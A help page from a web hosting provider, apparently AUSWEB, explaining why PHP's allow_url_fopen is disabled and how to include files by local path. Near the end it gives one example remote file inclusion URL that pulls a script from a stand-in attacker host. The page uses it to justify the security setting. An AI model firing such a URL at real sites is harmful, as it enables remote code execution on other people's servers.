Web Hosting

Reseller Hosting

VPS Hosting

Dedicated Servers

Domain Names

Help Desk

Web Hosting Tutorials

Contact Us

Client Area

Site Search

Email Tutorial and Setup

WHM Reseller Tutorials

Plesk ASP.NET Tutorials

Plesk 9 Tutorials

Plesk 9 Reseller Tutorials

Windows Plesk Reseller

Windows 2003 Server Tips

Photo Gallery Hosting

Adobe Photoshop Trix

Photoshop CS3 Tutorials

Fireworks CS3 Tips

PHP and MySQL

Fantastico Scripts

Dreamweaver HTML Editor

Free Website Builders

Website Security/Upgrades

Mixed Web News

Search Engine Optimization

Your PC Security

Customer Testimonials

Site Map

Network Speed Test

AUSWEB Blog

Order your hosting or
a dedicated server below

Security issues - allow_url_fopen

The PHP option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. For security reasons, AUSWEB has disabled this feature; however, a feature-rich alternative exists in the form of the bundled cURL library

Server-Side Includes

Many developers include files by pointing to a remote URL, even if the file is within the local system. For example:

<?php include("http://example.com/includes/example_include.php"); ?>

With allow_url_fopen disabled, this method will not work. Instead, the file must be included with a local path, and there are three methods of doing this:

By using a relative path, such as ../includes/example_include.php.
By using an absolute path (also known as relative-from-root), such as /home/username/example.com/includes/example_include.php.
By using the PHP environment variable $_SERVER['DOCUMENT_ROOT'], which returns the absolute path to the web root directory. This is by far the best (and most portable) solution. The example that follows shows the environment variable in action:

Processing Differences (and passing variables to an included file)

It is worth mentioning that the alternative solutions presented here will result in a difference in the way the include() function is handled. The alternative solutions all return the PHP code from the included page; however, the now-unavailable remote URL method returns the result from the included page. One result of this behavior is that you cannot pass a querystring using the alternative solutions. You define the variables locally before performing the include:

Example

To achieve the effect of this:

<?php include("http://yourdomain.com/includes/example_include.php?var=example"); ?>

You must instead use this:

<?php
$var = "example";
include($_SERVER['DOCUMENT_ROOT']."/includes/example_include.php");
?>

Example exploitation

If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:
http://yourdomain.com/index.php?page=http://crackerscum.net/evilscript.txt

So to avoid potential compromisse of our clients websites the PHP variable allow_url_fopen=off is on all our servers now

Newer news items: